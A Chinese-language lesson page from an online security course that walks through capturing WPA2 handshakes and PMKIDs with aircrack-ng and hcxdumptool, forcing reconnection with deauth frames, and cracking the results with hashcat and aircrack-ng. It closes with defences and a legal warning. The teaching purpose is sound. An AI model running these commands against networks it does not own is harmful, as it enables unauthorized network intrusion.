捕获并破解 WPA2 握手
使用 aircrack-ng 捕获四次握手,并使用 Hashcat 尝试字典攻击。
捕获并破解 WPA2 握手 是 CoddyKit 上的免费 Cyber Security Academy 课时。 这是第 2 节课,共 4 节。 你可以在下方免费阅读本课时的完整内容 — 然后在浏览器中使用内置代码编辑器和全天候 AI 导师进行实践。 这是 Cyber Security Academy 学习路径的一部分,你的进度在网页和 CoddyKit 应用中同步。 Cyber Security Academy 课程共包含 4 节课。
四次握手
客户端连接到 WPA2 网络时,四次握手会根据 PMK(由 PSK 派生)和随机数生成成对临时密钥(PTK)。捕获这次握手后,就可以进行离线密码破解。
设置监控模式
监控模式允许无线网卡捕获所有帧,而不论帧的目标地址是什么,这对于被动捕获握手是必需的。只有支持监控模式的网卡才能使用此功能。
# Check wireless interface
iwconfig
# Enable monitor mode
sudo airmon-ng start wlan0
# Creates: wlan0mon
# Kill interfering processes first:
sudo airmon-ng check kill被动捕获握手
Airodump-ng 会被动捕获帧。您可以等待客户端自然连接,也可以通过去认证强制客户端重新连接。握手捕获信息会显示在 airodump 输出的右上角。
# Scan for networks
sudo airodump-ng wlan0mon
# Target a specific AP (replace values)
sudo airodump-ng -c 6 \
--bssid AA:BB:CC:DD:EE:FF \
-w handshake_capture \
wlan0mon
# Top right shows: WPA handshake: AA:BB:...去认证攻击
发送伪造的去认证帧会迫使已连接的客户端断开并重新连接,从而触发新的握手捕获。这种方法容易产生大量异常流量并被检测到,而且要求客户端处于信号范围内。
# Send deauth frames (authorized labs only)
sudo aireplay-ng -0 5 \
-a AA:BB:CC:DD:EE:FF \
-c CC:DD:EE:FF:00:11 \
wlan0mon
# -0 5 = send 5 deauth frames
# -a = AP MAC
# -c = client MAC (or omit for broadcast)PMKID 攻击:无需客户端
PMKID 攻击(hcxdumptool)可以从信标帧或探测帧中捕获 PMKID,无需连接中的客户端。它获取信息的速度更快,而且与完整握手一样可以被破解。
# Capture PMKID
hcxdumptool -i wlan0mon --enable_status=1 \
-o pmkid.pcapng
# Convert for Hashcat
hcxpcapngtool -o hash.hc22000 pmkid.pcapng
# Crack with Hashcat mode 22000
hashcat -m 22000 hash.hc22000 rockyou.txt使用 Hashcat 破解握手
转换捕获文件,然后使用 Hashcat 模式 22000(WPA2 统一格式)或模式 2500(旧格式)进行攻击。结合 rockyou.txt 和规则使用,效果最佳。
# Convert pcap to Hashcat format
hcxpcapngtool -o hash.hc22000 handshake_capture-01.cap
# Crack with dictionary
hashcat -m 22000 hash.hc22000 rockyou.txt
# With rules
hashcat -m 22000 hash.hc22000 rockyou.txt -r best64.rule
# Brute force (short passwords)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d使用 Aircrack-ng 破解
Aircrack-ng 可以直接从捕获文件执行基于 CPU 的 WPA2 破解。它比基于 GPU 的 Hashcat 破解速度慢,但不需要转换格式。
# Crack with aircrack-ng
aircrack-ng -w rockyou.txt handshake_capture-01.cap
# With multiple wordlists:
aircrack-ng -w wordlist1.txt,wordlist2.txt capture-01.cap密码字典策略
WPA2 密码破解能否成功,完全取决于密码字典的质量。可使用:作为基础的 rockyou.txt、用于生成变体的 Hashcat 规则集、公司专用密码字典(名称+年份+符号),以及通过 OSINT 获取的定向字典。
破解时间的实际情况
包含 20 个以上字符的随机 WPA2 密码在计算上难以破解。破解实际上只适用于较短或基于字典的密码。这就是密码长度和随机性比复杂度规则更重要的原因。
防御措施
请使用 WPA3-SAE(可抵御离线字典攻击),或使用包含 20 个以上随机字符的 WPA2 密码短语,并采用配合 EAP-TLS 的 WPA2-Enterprise(使用证书而非密码)。
法律提醒
在不属于您的网络上捕获 WPA2 握手属于违法行为。此处介绍的所有技术仅适用于您自己的测试网络或获得授权的实验环境(例如家庭实验室、专用测试 AP)。
快速检查
与标准握手捕获相比,PMKID 攻击改进了什么?
总结:WPA2 破解
捕获 WPA2 握手(或 PMKID)后,就能将 WiFi 破解转变为离线字典攻击。成功与否完全取决于密码强度:较短且基于字典的密码很快就会被破解,而较长的随机密码实际上难以破解。应通过 WPA3-SAE、强密码短语以及面向企业网络的 WPA2-Enterprise 进行防御。
用 AI 导师学习 Cyber Security Academy — 免费
在浏览器中编写并运行真实代码,获得全天候 AI 导师的即时帮助,并在网页或应用中继续学习。
- 课程
- 76
- 课程
- 303
常见问题解答
「捕获并破解 WPA2 握手」课时是免费的吗?
是的 — 「捕获并破解 WPA2 握手」的完整文本可在网页上免费阅读。要进行交互式练习(内置代码编辑器和全天候 AI 导师)并解锁 Cyber Security Academy 课程的其余内容,请升级到 CoddyKit PRO。 Cyber Security Academy 课程共包含 4 节课。
「捕获并破解 WPA2 握手」这节课中我会学到什么?
使用 aircrack-ng 捕获四次握手,并使用 Hashcat 尝试字典攻击。 你通过在浏览器中直接运行的动手代码来练习 Cyber Security Academy,全天候 AI 导师会在你学习这节课的过程中回答你的问题。
学习 Cyber Security Academy 需要有经验吗?
无需任何先前经验。CoddyKit 上的 Cyber Security Academy 课程适合初学者到高级学习者,你可以从这里开始或从头开始,按照自己的节奏学习。 这是第 2 节课,共 4 节。
「捕获并破解 WPA2 握手」课时需要多长时间?
大多数 CoddyKit 课程大约需要 5–10 分钟。每节课都很精短且互动,所以你能稳步进步,并在网页和应用中从离开的地方继续。
我能在这节 Cyber Security Academy 课中编写并运行代码吗?
能。每节 Cyber Security Academy 课都包含内置代码编辑器,你可以在浏览器中直接编写并运行真实代码,并获得即时 AI 反馈 — 无需本地设置。